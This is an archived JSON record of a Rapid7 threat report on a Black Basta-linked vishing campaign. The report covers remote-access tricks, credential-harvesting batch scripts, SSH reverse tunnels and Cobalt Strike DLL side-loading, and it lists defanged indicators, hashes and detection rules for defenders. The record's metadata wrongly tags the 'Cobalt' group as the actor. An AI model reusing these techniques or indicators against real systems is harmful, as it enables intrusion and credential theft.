{
	"id": "46a14f62-2607-4ba4-a26e-480e335e95ca",
	"created_at": "2026-04-06T00:17:58.762263Z",
	"updated_at": "2026-04-10T13:11:23.876971Z",
	"deleted_at": null,
	"sha1_hash": "66c819109927dfaea9ac8548f5387141d6f36cc4",
	"title": "Ongoing Social Engineering Campaign Linked to Black Basta Ransomware Operators",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1433743,
	"plain_text": "Ongoing Social Engineering Campaign Linked to Black Basta\r\nRansomware Operators\r\nBy Rapid7\r\nPublished: 2024-05-10 · Archived: 2026-04-05 22:28:01 UTC\r\nCo-authored by Rapid7 analysts Tyler McGraw, Thomas Elkins, and Evan McCann\r\nExecutive Summary\r\nRapid7 has identified an ongoing social engineering campaign that has been targeting multiple managed detection and\r\nresponse (MDR) customers. The incident involves a threat actor overwhelming a user's email with junk and calling the user,\r\noffering assistance. The threat actor prompts impacted users to download remote monitoring and management software like\r\nAnyDesk or utilize Microsoft's built-in Quick Assist feature in order to establish a remote connection. Once a remote\r\nconnection has been established, the threat actor moves to download payloads from their infrastructure in order to harvest\r\nthe impacted users credentials and maintain persistence on the impacted users asset.\r\nIn one incident, Rapid7 observed the threat actor deploying Cobalt Strike beacons to other assets within the compromised\r\nnetwork. While ransomware deployment was not observed in any of the cases Rapid7 responded to, the indicators of\r\ncompromise we observed were previously linked with the Black Basta ransomware operators based on OSINT and other\r\nincident response engagements handled by Rapid7.\r\nOverview\r\nSince late April 2024, Rapid7 identified multiple cases of a novel social engineering campaign. The attacks begin with a\r\ngroup of users in the target environment receiving a large volume of spam emails. In all observed cases, the spam was\r\nsignificant enough to overwhelm the email protection solutions in place and arrived in the user’s inbox. Rapid7 determined\r\nmany of the emails themselves were not malicious, but rather consisted of newsletter sign-up confirmation emails from\r\nnumerous legitimate organizations across the world.\r\nhttps://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/\r\nPage 1 of 10\n\nWith the emails sent, and the impacted users struggling to handle the volume of the spam, the threat actor then began to\r\ncycle through calling impacted users posing as a member of their organization’s IT team reaching out to offer support for\r\ntheir email issues. For each user they called, the threat actor attempted to socially engineer the user into providing remote\r\naccess to their computer through the use of legitimate remote monitoring and management solutions. In all observed cases,\r\nRapid7 determined initial access was facilitated by either the download and execution of the commonly abused RMM\r\nsolution AnyDesk, or the built-in Windows remote support utility Quick Assist.\r\nIn the event the threat actor’s social engineering attempts were unsuccessful in getting a user to provide remote access,\r\nRapid7 observed they immediately moved on to another user who had been targeted with their mass spam emails.\r\nOnce the threat actor successfully gains access to a user’s computer, they begin executing a series of batch scripts, presented\r\nto the user as updates, likely in an attempt to appear more legitimate and evade suspicion. The first batch script executed by\r\nthe threat actor typically verifies connectivity to their command and control (C2) server and then downloads a zip archive\r\ncontaining a legitimate copy of OpenSSH for Windows (ultimately renamed to ***RuntimeBroker.exe***), along with its\r\ndependencies, several RSA keys, and other Secure Shell (SSH) configuration files. SSH is a protocol used to securely send\r\ncommands to remote computers over the internet. While there are hard-coded C2 servers in many of the batch scripts, some\r\nare written so the C2 server and listening port can be specified on the command line as an override.\r\nhttps://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/\r\nPage 2 of 10\n\nThe script then establishes persistence via run key entries  in the Windows registry. The run keys created by the batch script\r\npoint to additional batch scripts that are created at run time. Each batch script pointed to by the run keys executes SSH via\r\nPowerShell in an infinite loop to attempt to establish a reverse shell connection to the specified C2 server using the\r\ndownloaded RSA private key. Rapid7 observed several different variations of the batch scripts used by the threat actor, some\r\nof which also conditionally establish persistence using other remote monitoring and management solutions, including\r\nNetSupport and ScreenConnect.\r\nhttps://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/\r\nPage 3 of 10\n\nIn all observed cases, Rapid7 has identified the usage of a batch script to harvest the victim’s credentials from the command\r\nline using PowerShell. The credentials are gathered under the false context of the “update” requiring the user to log in. In\r\nmost of the observed batch script variations, the credentials are immediately exfiltrated to the threat actor’s server via a\r\nSecure Copy command (SCP). In at least one other observed script variant, credentials are saved to an archive and must be\r\nmanually retrieved.\r\nhttps://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/\r\nPage 4 of 10\n\nIn one observed case, once the initial compromise was completed, the threat actor then attempted to move laterally\r\nthroughout the environment via SMB using Impacket, and ultimately failed to deploy Cobalt Strike despite several attempts.\r\nWhile Rapid7 did not observe successful data exfiltration or ransomware deployment in any of our investigations, the\r\nindicators of compromise found via forensic analysis conducted by Rapid7 are consistent with the Black Basta ransomware\r\ngroup based on internal and open source intelligence.\r\nForensic Analysis\r\nIn one incident, Rapid7 observed the threat actor attempting to deploy additional remote monitoring and management tools\r\nincluding ScreenConnect and the NetSupport remote access trojan (RAT). Rapid7 acquired the Client32.ini file, which holds\r\nthe configuration data for the NetSupport RAT, including domains for the connection. Rapid7 observed the NetSupport RAT\r\nattempt communication with the following domains:\r\nrewilivak13[.]com\r\ngreekpool[.]com\r\nhttps://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/\r\nPage 5 of 10\n\nAfter successfully gaining access to the compromised asset, Rapid7 observed the threat actor attempting to deploy Cobalt\r\nStrike beacons, disguised as a legitimate Dynamic Link Library (DLL) named 7z.DLL, to other assets within the same\r\nnetwork as the compromised asset using the Impacket toolset.\r\nIn our analysis of 7z.DLL, Rapid7 observed the DLL was altered to include a function whose purpose was to XOR-decrypt\r\nthe Cobalt Strike beacon using a hard-coded key and then execute the beacon.\r\nThe threat actor would attempt to deploy the Cobalt Strike beacon by executing the legitimate binary 7zG.exe and passing a\r\ncommand line argument of `b`, i.e. `C:\\Users\\Public\\7zG.exe b`. By doing so, the legitimate binary 7zG.exe side-loads\r\n7z.DLL, which in turn executes the embedded Cobalt Strike beacon. This technique is known as DLL side-loading, a method\r\nRapid7 previously discussed in a blog post on the IDAT Loader.\r\nUpon successful execution, Rapid7 observed the beacon inject a newly created process, choice.exe.\r\nMitigations\r\nRapid7 recommends baselining your environment for all installed remote monitoring and management solutions and\r\nutilizing application allowlisting solutions, such as AppLocker or Microsoft Defender Application Control, to block all\r\nhttps://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/\r\nPage 6 of 10\n\nunapproved RMM solutions from executing within the environment. For example, the Quick Assist tool, quickassist.exe, can\r\nbe blocked from execution via AppLocker.  As an additional precaution, Rapid7 recommends blocking domains associated\r\nwith all unapproved RMM solutions. A public GitHub repo containing a catalog of RMM solutions, their binary names, and\r\nassociated domains can be found here.\r\nRapid7 recommends ensuring users are aware of established IT channels and communication methods to identify and\r\nprevent common social engineering attacks. We also recommend ensuring users are empowered to report suspicious phone\r\ncalls and texts purporting to be from internal IT staff.\r\nMITRE ATT\u0026CK Techniques\r\nTactic Technique Procedure\r\nDenial of\r\nService\r\nT1498: Network Denial of Service\r\nThe threat actor overwhelms email protection\r\nsolutions with spam.\r\nInitial Access T1566.004: Phishing: Spearphishing Voice\r\nThe threat actor calls impacted users and pretends\r\nto be a member of their organization’s IT team to\r\ngain remote access.\r\nExecution\r\nT1059.003: Command and Scripting Interpreter:\r\nWindows Command Shell\r\nThe threat actor executes batch script after\r\nestablishing remote access to a user’s asset.\r\nExecution\r\nT1059.001: Command and Scripting Interpreter:\r\nPowerShell\r\nBatch scripts used by the threat actor execute\r\ncertain commands via PowerShell.\r\nPersistence\r\nT1547.001: Boot or Logon Autostart Execution:\r\nRegistry Run Keys / Startup Folder\r\nThe threat actor creates a run key to execute a\r\nbatch script via PowerShell, which then attempts\r\nto establish a reverse tunnel via SSH.\r\nDefense\r\nEvasion\r\nT1222.001: File and Directory Permissions\r\nModification: Windows File and Directory\r\nPermissions Modification\r\nThe threat actor uses cacls.exe via batch script to\r\nmodify file permissions.\r\nDefense\r\nEvasion\r\nT1140: Deobfuscate/Decode Files or\r\nInformation\r\nThe threat actor encrypted several zip archive\r\npayloads with the password “qaz123”.\r\nCredential\r\nAccess\r\nT1056.001: Input Capture: Keylogging\r\nThe threat actor runs a batch script that records\r\nthe user’s password via command line input.\r\nDiscovery T1033: System Owner/User Discovery\r\nThe threat actor uses whoami.exe to evaluate if\r\nthe impacted user is an administrator or not.\r\nLateral\r\nMovement\r\nT1570: Lateral Tool Transfer\r\nImpacket was used to move payloads between\r\ncompromised systems.\r\nCommand and\r\nControl\r\nT1572: Protocol Tunneling\r\nAn SSH reverse tunnel is used to provide the\r\nthreat actor with persistent remote access.\r\nRapid7 Customers\r\nInsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive\r\nlibrary of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into\r\nhttps://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/\r\nPage 7 of 10\n\nsuspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will\r\nalert on behavior related to this malware campaign:\r\nDetections\r\nAttacker Technique - Renamed SSH For Windows\r\nPersistence - Run Key Added by Reg.exe\r\nSuspicious Process - Non Approved Application\r\nSuspicious Process - 7zip Executed From Users Directory (*InsightIDR product only customers should evaluate and\r\ndetermine if they would like to activate this detection within the InsightIDR detection library; this detection is currently\r\nactive for MDR/MTC customers)\r\nAttacker Technique - Enumerating Domain Or Enterprise Admins With Net Command\r\nNetwork Discovery - Domain Controllers via Net.exe\r\nIndicators of Compromise\r\nNetwork Based Indicators (NBIs)\r\nDomain/IPv4 Address Notes\r\nupd7[.]com Batch script and remote access tool host.\r\nupd7a[.]com Batch script and remote access tool host.\r\n195.123.233[.]55 C2 server contained within batch scripts.\r\n38.180.142[.]249 C2 server contained within batch scripts.\r\n5.161.245[.]155 C2 server contained within batch scripts.\r\n20.115.96[.]90 C2 server contained within batch scripts.\r\n91.90.195[.]52 C2 server contained within batch scripts.\r\n195.123.233[.]42 C2 server contained within batch scripts.\r\n15.235.218[.]150 AnyDesk server used by the threat actor.\r\ngreekpool[.]com Primary NetSupport RAT gateway.\r\nrewilivak13[.]com Secondary NetSupport RAT gateway.\r\n77.246.101[.]135 C2 address used to connect via AnyDesk.\r\nlimitedtoday[.]com Cobalt Strike C2 domain.\r\nthetrailbig[.]net Cobalt Strike C2 domain.\r\nHost-based indicators (HBIs)\r\nhttps://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/\r\nPage 8 of 10\n\nFile SHA256 Notes\r\ns.zip C18E7709866F8B1A271A54407973152BE1036AD3B57423101D7C3DA98664D108\r\nPayload\r\ncontaining\r\nSSH config\r\nfiles used by\r\nthe threat\r\nactor.\r\nid_rsa 59F1C5FE47C1733B84360A72E419A07315FBAE895DD23C1E32F1392E67313859\r\nPrivate RSA\r\nkey that is\r\ndownloaded t\r\nimpacted\r\nassets.\r\nid_rsa_client 2EC12F4EE375087C921BE72F3BD87E6E12A2394E8E747998676754C9E3E9798E\r\nPrivate RSA\r\nkey that is\r\ndownloaded t\r\nimpacted\r\nassets.\r\nauthorized_keys 35456F84BC88854F16E316290104D71A1F350E84B479EEBD6FBB2F77D36BCA8A\r\nAuthorized\r\nkey\r\ndownloaded t\r\nimpacted\r\nassets by the\r\nthreat actor.\r\nRuntimeBroker.exe 6F31CF7A11189C683D8455180B4EE6A60781D2E3F3AADF3ECC86F578D480CFA9\r\nRenamed cop\r\nof the\r\nlegitimate\r\nOpenSSH for\r\nWindows\r\nutility.\r\na.zip A47718693DC12F061692212A354AFBA8CA61590D8C25511C50CFECF73534C750\r\nPayload that\r\ncontains a\r\nbatch script\r\nand the\r\nlegitimate\r\nScreenConne\r\nsetup\r\nexecutable.\r\na3.zip 76F959205D0A0C40F3200E174DB6BB030A1FDE39B0A190B6188D9C10A0CA07C8\r\nContains a\r\ncredential\r\nharvesting\r\nbatch script.\r\nNEVER MISS AN EMERGING THREAT\r\nhttps://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/\r\nPage 9 of 10\n\nBe the first to learn about the latest vulnerabilities and cybersecurity news.\r\nSubscribe Now\r\nSource: https://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/\r\nhttps://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/"
	],
	"report_names": [
		"ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434678,
	"ts_updated_at": 1775826683,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/66c819109927dfaea9ac8548f5387141d6f36cc4.pdf",
		"text": "https://archive.orkl.eu/66c819109927dfaea9ac8548f5387141d6f36cc4.txt",
		"img": "https://archive.orkl.eu/66c819109927dfaea9ac8548f5387141d6f36cc4.jpg"
	}
}